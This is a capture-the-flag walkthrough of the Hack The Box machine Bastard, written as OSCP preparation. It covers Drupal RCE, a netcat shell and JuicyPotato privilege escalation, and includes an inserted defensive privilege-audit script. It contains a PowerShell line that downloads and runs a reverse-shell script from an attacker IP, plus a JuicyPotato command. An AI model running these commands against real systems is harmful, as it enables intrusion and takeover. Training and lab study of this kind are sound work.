OSCP PREPARATIONS – HTB Bastard

Bastard is a retired Windows machine on Hack The Box. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We perform a network scan with nmap to identify the target machine's services.
Classic scan

Full port scan

As a result of the port scan, the following ports are open: 80/tcp (http, IIS httpd 7.5), 135/tcp (msrpc, Windows RPC) and 49154/tcp (msrpc, Windows RPC).
We enumerate port 80.

We encountered a Drupal CMS with an admin login; we tried default passwords but were not successful. We checked the output given by Nmap and saw the version number in /CHANGELOG.txt.

We saw it was 7.54, so let's see if there is a vulnerability for that version.
Searchsploit found:

There is an RCE vulnerability; we prefer the unauthenticated one because we still have not found any credentials at this point.
I'm trying to exploit this vulnerability from my own machine.

We edited this line to suit our needs.
But when we tried to run this exploit we got an error:

Let's search for exploits on GitHub.

We downloaded this and used it.

Having seen its usage, let's run it against the target.

Here we were able to run the whoami command.
Now let's try to install and run nc to get an interactive shell.
We've installed nc on the target:

Then we ran nc.exe and it gave us a shell.

Here we obtained the user flag, but we cannot access the Administrator folder.

Here we enumerate locally to find a way to the root flag.

From this enumeration we see that JuicyPotato is applicable here.
We transfer JuicyPotato.exe and Shell.bat to the target machine.
Shell.bat contains: powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')"
We write it:
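JuicyPotato only works when the account running the exploited service holds an enabled token-impersonation privilege, which is what the local enumeration above is really looking for. As an added example (not part of the original writeup), a small Python audit helper that parses `whoami /priv` output and flags exactly those privileges, so a defender reviewing a web application pool identity can spot the same exposure; the `whoami /priv` text below is a constructed sample, not output captured from the machine.

```python
import re

# Privileges that allow a process to impersonate or assign another user's
# token. Potato-family local privilege escalation (JuicyPotato on this box)
# relies on the compromised service account having one of these enabled.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample of `whoami /priv` output (not captured from the target).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege per line: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_impersonation_privs(text):
    """Sorted names of enabled privileges that make the account a potato target."""
    privs = parse_whoami_priv(text)
    return sorted(p for p, state in privs.items()
                  if p in IMPERSONATION_PRIVS and state == "Enabled")


if __name__ == "__main__":
    found = risky_impersonation_privs(SAMPLE_WHOAMI_PRIV)
    if found:
        print("Review this service account, impersonation enabled:", ", ".join(found))
    else:
        print("No token-impersonation privileges enabled.")
```

Running the same check against the real service account (for example an IIS application pool identity) is how a defender confirms that restricting or removing these privileges closes off this escalation path.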

Then we transfer it to the target:

Then we run JuicyPotato.exe:
.\JuicyPotato.exe -t * -p shell.bat -l 5555 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

We write it and run it; the shell arrives on port 4723, which we are listening on with nc.

Now we get the root flag.